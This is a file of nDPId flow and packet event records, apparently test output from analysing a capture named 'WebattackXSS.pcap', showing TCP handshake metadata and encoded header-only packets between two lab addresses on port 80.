+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1v760xqZLWgtEaAScSBmwwAAAgQFtAQCCAoD478iATntrAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1499347235717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347235717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wL1AAD4GBRusEAABwKgKMtb+AFAtaC0R+tMamoAQAOUFywAAAQEICgE57awD478i"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347238260,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347238260,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N5lAAD4GjjesEAABwKgKMtcYAFCMG8exAAAAAKACchBCbAAAAgQFtAQCCAoBOfAoAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1xiQuLeAjBvHsqAScSA1kAAAAgQFtAQCCAoD48GeATnwKAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1499347238261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347238261,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N5pAAD4Gjj6sEAABwKgKMtcYAFCMG8eykLi3gYAQAOXUlwAAAQEICgE58CgD48Ge"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347239517,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347239517,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d9VAAD4GTfusEAABwKgKMtcmAFDWiYa3AAAAAKACchA3sAAAAgQFtAQCCAoBOfFiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1yYFUEfr1omGuKAScSAkmAAAAgQFtAQCCAoD48LYATnxYgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1499347239518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347239518,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d9ZAAD4GTgKsEAABwKgKMtcmAFDWiYa4BVBH7IAQAOXDnwAAAQEICgE58WID48LY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347240786,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347240786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LjpAAD4Gl5asEAABwKgKMtc0AFB5mNylAAAAAKACchA9aAAAAgQFtAQCCAoBOfKfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1zRt9KwCeZjcpqAScSBcVgAAAgQFtAQCCAoD48QWATnynwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1499347240787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347240787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LjtAAD4Gl52sEAABwKgKMtc0AFB5mNymbfSsA4AQAOX7XAAAAQEICgE58qAD48QW"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347243333,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347243333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87MZAAD4G2QmsEAABwKgKMtdOAFA1pxnaAAAAAKACchBBjgAAAgQFtAQCCAoBOfUcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ104lyvYYNacZ26AScSBcFAAAAgQFtAQCCAoD48aSATn1HAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1499347243334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347243334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07MdAAD4G2RCsEAABwKgKMtdOAFA1pxnbJcr2GYAQAOX7GwAAAQEICgE59RwD48aS"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347244580,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347244580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UrJAAD4Gcx6sEAABwKgKMtdcAFCKtaTmAAAAAKACchBgLQAAAgQFtAQCCAoBOfZUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ11yGUuJUirWk56AScSAstwAAAgQFtAQCCAoD48fKATn2VAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1499347244581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347244581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UrNAAD4GcyWsEAABwKgKMtdcAFCKtaTnhlLiVYAQAOXLvgAAAQEICgE59lQD48fK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347247114,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347247114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GLNAAD4GrR2sEAABwKgKMtd2AFApn+B+AAAAAKACchCDGAAAAgQFtAQCCAoBOfjNAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ13ZCBl2jKZ\/gf6AScSAWJgAAAgQFtAQCCAoD48pEATn4zQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1499347247115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347247115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GLRAAD4GrSSsEAABwKgKMtd2AFApn+B\/QgZdpIAQAOW1LAAAAQEICgE5+M4D48pE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347248373,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347248373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JiRAAD4Gn6ysEAABwKgKMteEAFBjB9wsAAAAAKACchBMuQAAAgQFtAQCCAoBOfoIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ14RKuW9xYwfcLaAScSDECwAAAgQFtAQCCAoD48t+ATn6CAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1499347248374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347248374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JiVAAD4Gn7OsEAABwKgKMteEAFBjB9wtSrlvcoAQAOVjEgAAAQEICgE5+gkD48t+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347249651,"flow_last_seen":1499347249651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347249651,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1499347249651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ostAAD4GIwWsEAABwKgKMteSAFAC31mDAAAAAKACchAuPQAAAgQFtAQCCAoBOftIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1499347249652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ15JGEK8pAt9ZhKAScSBpQAAAAgQFtAQCCAoD48y+ATn7SAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":3,"flow_last_seen":1499347249652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347249652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0osxAAD4GIwysEAABwKgKMteSAFAC31mERhCvKoAQAOUISAAAAQEICgE5+0gD48y+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347252179,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252179,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86Q5AAD4G3MGsEAABwKgKMtesAFDOJxTOAAAAAKACchClFwAAAgQFtAQCCAoBOf3AAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ16ypaMjNzicUz6AScSBgpgAAAgQFtAQCCAoD4882ATn9wAEDAwc="} 